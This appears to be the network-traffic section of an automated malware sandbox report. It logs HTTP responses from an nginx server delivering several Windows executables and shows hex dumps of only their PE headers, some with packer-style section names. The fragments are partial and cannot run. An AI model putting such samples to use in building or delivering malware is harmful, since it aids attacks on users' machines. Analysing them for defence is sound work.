0a 02 03 28 8f 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:11 GMTContent-Type: application/octet-streamContent-Length: 961024Last-Modified: Tue, 11 Feb 2025 17:08:45 GMTConnection: keep-aliveETag: "67ab841d-eaa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 09 84 ab 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 04 49 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 4c 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:14 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:21 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:26 GMTContent-Type: application/octet-streamContent-Length: 10302976Last-Modified: Fri, 24 Jan 2025 18:07:34 GMTConnection: keep-aliveETag: "6793d6e6-9d3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 16 9d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 24 49 00 00 bc 04 00 00 00 00 00 d0 61 06 00 00 10 00 00 00 f0 94 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 80 a0 00 00 04 00 00 f7 da 9d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 9c 00 dc 03 00 00 00 60 a0 00 97 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 9c 00 6a a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 fa 94 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 22 49 00 00 10 00 00 00 24 49 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 a8 4b 00 00 40 49 00 00 aa 4b 00 00 28 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 93 07 00 00 f0 94 00 00 9e 04 00 00 d2 94 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 90 9c 00 00 04 00 00 00 70 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6a a0 03 00 00 a0 9c 00 00 a2 03 00 00 74 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 50 a0 00 00 02 00 00 00 16 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 97 1c 00 00 00 60 a0 00 00 1e 00 00 00 18 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:24 GMTContent-Type: application/octet-streamContent-Length: 2155008Last-Modified: Tue, 11 Feb 2025 17:11:35 GMTConnection: keep-aliveETag: "67ab84c7-20e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 51 4b 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ad 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 70 74 66 73 68 65 00 30 1a 00 00 90 31 00 00 24 1a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 67 6f 62 61 66 74 6d 00 10 00 00 00 c0 4b 00 00 04 00 00 00 bc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 c0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:31 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:38 GMTContent-Type: application/octet-streamContent-Length: 414016Last-Modified: Tue, 11 Feb 2025 08:59:13 GMTConnection: keep-aliveETag: "67ab1161-65140"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 f2 43 da 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 f0 00 00 00 08 00 00 00 00 00 00 be 0e 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 0e 01 00 4b 00 00 00 00 20 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 0c 06 00 40 45 00 00 00 40 01 00 0c 00 00 00 21 0e 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 ee 00 00 00 20 00 00 00 f0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 10 05 00 00 60 01 00 00 10 05 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:43 GMTContent-Type: application/octet-streamContent-Length: 745472Last-Modified: Thu, 06 Feb 2025 02:47:54 GMTConnection: keep-aliveETag: "67a422da-b6000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 